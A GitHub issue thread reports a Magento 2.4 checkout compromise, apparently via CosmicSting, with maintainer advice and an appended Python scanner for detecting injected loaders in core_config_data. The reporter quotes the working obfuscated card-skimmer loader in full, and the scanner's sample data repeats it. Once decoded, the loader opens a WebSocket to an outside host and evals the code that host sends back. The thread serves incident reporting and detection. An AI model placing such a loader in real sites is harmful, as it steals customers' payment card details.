Magento 2.4 Checkout Payment Method Hacked #39526
Comments
Hi @Arsalanulhaq. Thank you for your report.
Join Magento Community Engineering Slack and ask your questions in #github channel.
It sounds like you're being hit by CosmicSting. Here are some resources on that matter:
Good luck!
Thanks. I have applied the adobe patch in the above link. Let's see how it goes. But actually he was able to change the core_config_data -> path -> 'design/head/ ' and not cms_blocks
Applying the patch is not enough, you also need to rotate your encryption key. As far as I can see, you can't change configuration values through the REST API by default, so no idea how they are doing it in your case. Maybe you can use https://sansec.io/guides/usage to scan your shop (in trial mode without a license it will just tell you if it found something, but not exactly what it found, but maybe that's enough for you to further investigate...)
Thanks @hostep for the detailed information on resolving this issue for @Arsalanulhaq. Hello @Arsalanulhaq, Thanks for the report and collaboration. Let us know if you can still reproduce this issue after applying the patch and rotating the encryption key. Thanks.
Hi @engcom-Hotel. Thank you for working on this issue.
Hello @Arsalanulhaq, We are still waiting for your response on this issue. Thanks
Hi @engcom-Hotel. So far the issue is not reproduced after applying the above recommended patch or maybe the hacker has forgotten. How can I try to produce this or check now?
Thanks @Arsalanulhaq, for the reply! We can assume that the issue has been resolved because the patch that you have applied is related to the issue you are facing. Hence we are closing this issue. In the future, if you are still facing the same issue, please re-open this issue or ask us to do the same. Thanks
Preconditions and environment
Steps to reproduce
Somehow the hacker was able to put this script in my core_config_data table in each design/head/includes.
I don't know how the hacker is able to do so, because he for sure cannot access the admin panel or db directly. So my guess is, he is doing it from any endpoint?
Add this script in design > configuration > Store View > HTML Head Section.
```html
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-55953316-1"></script>
<script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-55953316-1'); gtag('config', 'AW-982019842'); </script>
<script src="https://apis.google.com/js/platform.js?onload=renderBadge" async defer></script>
<script>(function(i, s, h, k, l, o, c, m) {m['GoogleAnalyticsObjects'] = o; c = s.createElement(h), i = s.getElementsByTagName(h)[0]; if (l.href.match(new RegExp(atob(o)))) {c.async = 1; c.src = new Function(atob(k)).call(this);}})('jb', document, 'script', 'd2luZG93Lnd3ID0gbmV3IFdlYlNvY2tldCgoJ3dzczovL2dzdGF0bGMub3JnL2ppdm8/c291cmNlPScpICsgZW5jb2RlVVJJQ29tcG9uZW50KGxvY2F0aW9uLmhyZWYpKTt3aW5kb3cud3cub25tZXNzYWdlPWZ1bmN0aW9uKGUpe2V2YWwoZS5kYXRhKX07', window.location, 'Y2hlY2tvdXQ' + '=', '//www.google-analytics.com/analytics.js', window);</script>
<script>(function(i, s, h, k, l, o, c, m) {m['GoogleAnalyticsObjects'] = o; c = s.createElement(h), i = s.getElementsByTagName(h)[0]; if (l.href.match(new RegExp(atob(o)))) {c.async = 1; c.src = new Function(atob(k)).call(this);}})('jb', document, 'script', 'd2luZG93Lnd3ID0gbmV3IFdlYlNvY2tldCgoJ3dzczovL2dzdGF0bGMub3JnL2ppdm8/c291cmNlPScpICsgZW5jb2RlVVJJQ29tcG9uZW50KGxvY2F0aW9uLmhyZWYpKTt3aW5kb3cud3cub25tZXNzYWdlPWZ1bmN0aW9uKGUpe2V2YWwoZS5kYXRhKX07', window.location, 'Y2hlY2tvdXQ' + '=', '//www.google-analytics.com/analytics.js', window);</script>
```
Expected result
Order placed successfully
Actual result
Payment method on checkout pops up an iframe similar to PayPal and steals the credit card details of customers
Additional information
No response
Release note
No response
Triage and priority
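A small check a store owner can run against the rows of `core_config_data` to spot the kind of loader reported in this issue: it looks only at the head/footer include paths, flags obfuscation constructs that ordinary analytics snippets do not use, and decodes the base64 literals (including the split `'Y2hlY2tvdXQ' + '='` form) so the hidden WebSocket/eval loader becomes visible. This is an added example, not Magento, Adobe or Sansec code; `SAMPLE_ROWS` is constructed from one clean snippet and the loader quoted in the issue body.

```python
"""Scan core_config_data (path, value) rows for an injected script loader.

Added example for this issue, not Magento or Sansec code. Feed it rows from:
  SELECT path, value FROM core_config_data WHERE path LIKE 'design/%';
"""
import base64
import re

# Config values rendered into every storefront page; where a skimmer loader lands.
WATCHED_PATHS = {"design/head/includes", "design/footer/absolute_footer",
                 "design/footer/miscellaneous"}
# Constructs legitimate tag snippets do not need but obfuscated loaders rely on.
INDICATORS = ("atob(", "new Function(", "eval(", "WebSocket(", "String.fromCharCode(")
# A single-quoted base64 literal, optionally split and re-joined with '+'.
B64_LITERAL = re.compile(r"'[A-Za-z0-9+/=]{8,}'(?:\s*\+\s*'[A-Za-z0-9+/=]*')*")


def decode_b64_literals(value):
    """Return UTF-8 text of every base64 literal in value; undecodable ones are skipped."""
    decoded = []
    for match in B64_LITERAL.finditer(value):
        joined = "".join(re.findall(r"'([A-Za-z0-9+/=]*)'", match.group(0)))
        try:
            decoded.append(base64.b64decode(joined, validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue
    return decoded


def scan_config_rows(rows):
    """rows: iterable of (path, value). Returns one finding dict per suspicious row."""
    findings = []
    for path, value in rows:
        if path not in WATCHED_PATHS or not value:
            continue
        raw_hits = [ind for ind in INDICATORS if ind in value]
        decoded = decode_b64_literals(value)
        # A decoded literal that itself contains loader constructs is the strongest signal.
        decoded_hits = [d for d in decoded if any(ind in d for ind in INDICATORS)]
        if raw_hits or decoded_hits:
            findings.append({"path": path, "indicators": raw_hits,
                             "decoded": decoded, "decoded_suspicious": decoded_hits})
    return findings


SAMPLE_ROWS = [  # constructed: a clean gtag snippet, then the loader from this issue
    ("design/head/includes",
     "<script>window.dataLayer = window.dataLayer || [];function gtag(){dataLayer.push(arguments);}"
     "gtag('js', new Date());gtag('config', 'UA-55953316-1');</script>"),
    ("design/head/includes",
     "<script>(function(i, s, h, k, l, o, c, m) {m['GoogleAnalyticsObjects'] = o; c = s.createElement(h), "
     "i = s.getElementsByTagName(h)[0]; if (l.href.match(new RegExp(atob(o)))) {c.async = 1; "
     "c.src = new Function(atob(k)).call(this);}})('jb', document, 'script', "
     "'d2luZG93Lnd3ID0gbmV3IFdlYlNvY2tldCgoJ3dzczovL2dzdGF0bGMub3JnL2ppdm8/c291cmNlPScpICsgZW5jb2RlVVJJQ29tcG9uZW50KGxvY2F0aW9uLmhyZWYpKTt3aW5kb3cud3cub25tZXNzYWdlPWZ1bmN0aW9uKGUpe2V2YWwoZS5kYXRhKX07', "
     "window.location, 'Y2hlY2tvdXQ' + '=', '//www.google-analytics.com/analytics.js', window);</script>"),
]

if __name__ == "__main__":
    for finding in scan_config_rows(SAMPLE_ROWS):
        print(finding["path"], finding["indicators"])
        for text in finding["decoded_suspicious"]:
            print("  decoded loader:", text)
```

A hit on these paths is a reason to follow the advice in the thread (apply the patch, rotate the encryption key, then remove the row), since the loader is only reachable because something was able to write arbitrary configuration values.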